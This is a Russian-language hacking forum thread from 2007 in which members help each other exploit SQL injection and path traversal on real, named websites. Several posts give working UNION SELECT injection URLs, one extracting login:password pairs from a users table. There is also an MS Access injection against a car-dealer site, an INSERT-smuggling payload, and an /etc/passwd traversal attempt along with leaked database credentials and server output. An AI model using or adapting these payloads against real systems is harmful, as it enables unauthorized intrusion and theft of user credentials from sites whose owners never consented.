03.12.2007, 12:06
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами:
10309346
Репутация:
4303
|
|
если ты подобрал кол-во столбцов, но выпадает такая ошибка, то 99% ты имеешь дело с мускулом 3-й версии
|
|
|
03.12.2007, 12:30
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
Сообщение от Spyder
если ты подобрал кол-во столбцов, но выпадает такая ошибка, то 99% ты имеешь дело с мускулом 3-й версии
а разве тогда будет ошибка связанная с кол-вом полей? я думал будет ошибка синтаксиса
__________________
Карфаген должен быть разрушен...
|
|
|
|
03.12.2007, 12:48
|
|
Познающий
Регистрация: 04.04.2007
Сообщений: 54
С нами:
10054253
Репутация:
86
|
|
Код:
http://www.rebellino.it/shop/pag_home/multimedia.php?id=-1+union+select+1,2,user(),version(),5,database()/*
Sql47718@62.149.140.24
Sql47718_3
4.0.27-standard-log
помогите пожалуйста с таблицами |
|
|
|
03.12.2007, 13:31
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами:
10309346
Репутация:
4303
|
|
а разве тогда будет ошибка связанная с кол-вом полей? я думал будет ошибка синтаксиса
не могу точно сказать почему именно такая ошибка, но я много раз сталкивался с подобной ситуацией
|
|
|
|
03.12.2007, 13:59
|
|
Участник форума
Регистрация: 06.06.2006
Сообщений: 213
С нами:
10488959
Репутация:
474
|
|
Вполне согласен со Scipio.
Возможно сначала идут 2 разных запроса, получают оба результата, и только после всего этого выводят в html.
И если какойто запрос не выполняется то exit(mysql_error());
имхо
Юзал недавно багу на 1 сайте, линк не помню, в общем посмотрел конфигурацию хостера - мускул 4 версии
|
|
|
|
04.12.2007, 22:48
|
|
Постоянный
Регистрация: 04.12.2007
Сообщений: 424
С нами:
9702986
Репутация:
479
|
|
есть такой запрос
INSERT INTO `login` (`userid` , `user_pass` , `sex` , `email` , `state` )
VALUES ('user', '1234', 'M', 'a@a.com[sql query]', '0');
собсно, вопрос: можно ли как-нибудь приписать туда свой запрос? у меня получалось добавить только такой же insert
e-mail=a@a.com','0'),('asd','asd','M','b@b.com','0') ;/*
но, хотелось бы чтонибудь более существенное, или инсерт, но с большим количеством столбцов.
вроде так
Последний раз редактировалось ntldr; 04.12.2007 в 22:50..
|
|
|
|
04.12.2007, 22:54
|
|
Познающий
Регистрация: 05.02.2007
Сообщений: 71
С нами:
10137645
Репутация:
82
|
|
Подскажите как можно решить вопрос с информацией по названию каталогов на сайте ?????
Есть SQL inj: http://kojyhovo.ru/news/news.php?id=-81+union+select+1,concat(login,char(58),password)+ from+users/*
но не могу найти админку может кто подскажет.
load_file('') не работает!
Заранее спасибо.
|
|
|
|
05.12.2007, 01:08
|
|
Участник форума
Регистрация: 08.09.2006
Сообщений: 194
С нами:
10354028
Репутация:
163
|
|
Возможно ли тут раскрутить иньекцию?
http://www.rochesterautodealers.com/news.asp?id=10'%201%20or%201=(select%20db_name())--
|
|
|
|
05.12.2007, 01:23
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
Сообщение от LolFEm
Возможно ли тут раскрутить иньекцию?
http://www.rochesterautodealers.com/news.asp?id=10'%201%20or%201=(select%20db_name())--
Это вобщето инъекция в MSAccess...
теоретически раскрутить можно:
Код:
http://www.rochesterautodealers.com/news.asp?id=1%20union%20select%201,2,3,4,5,6,7,8,9,10,11%20from%20admins
подбирай таблицы, прав на чтение системных таблиц нет
З.Ы. вобще .Slip в чем то прав, но это так, мысли вслух ни к кому неотносящиеся
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 05.12.2007 в 01:30..
|
|
|
|
07.12.2007, 11:49
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
С нами:
9741777
Репутация:
100
|
|
Вот мне интересно, что за дыра
http://sait.ru/index.php?fuse=admin&view=.../.../.../.../..../.../.../.../.../.../.../.../.../.../etc/passwd
В ответ вообще хз, что вылезло.
An error has occurred with the given operation
Fuse: admin
Action:
Type: User Error (256)
Description: View .../.../.../.../..../.../.../.../.../.../.../.../.../.../etc/passwd does not exist
Script: /var/www/saitdata/www/sait.ru/newedge/classes/NE_Controller.php
Line Number: 88
Stack:
/var/www/sait/data/www/sait.ru/newedge/classes/NE_Controller.php (88) : trigger_error
/var/www/sait/data/www/sait.ru/newedge/front.php (72) : ne_controller:  rocessview
/var/www/sait/data/www/sait.ru/index.php (3) : require
Попробовал по другому.
http://sait.ru/index.php?fuse=.../.../.../.../..../.../.../.../.../.../.../.../.../.../etc/passwd
Вышло следующее
Module .../.../.../.../..../.../.../.../.../.../.../.../.../.../etc/passwd does not exist or hasn't been properly installed
С таким никогда раньше не сталкивался.
Последний раз редактировалось Ershik; 07.12.2007 в 11:52..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
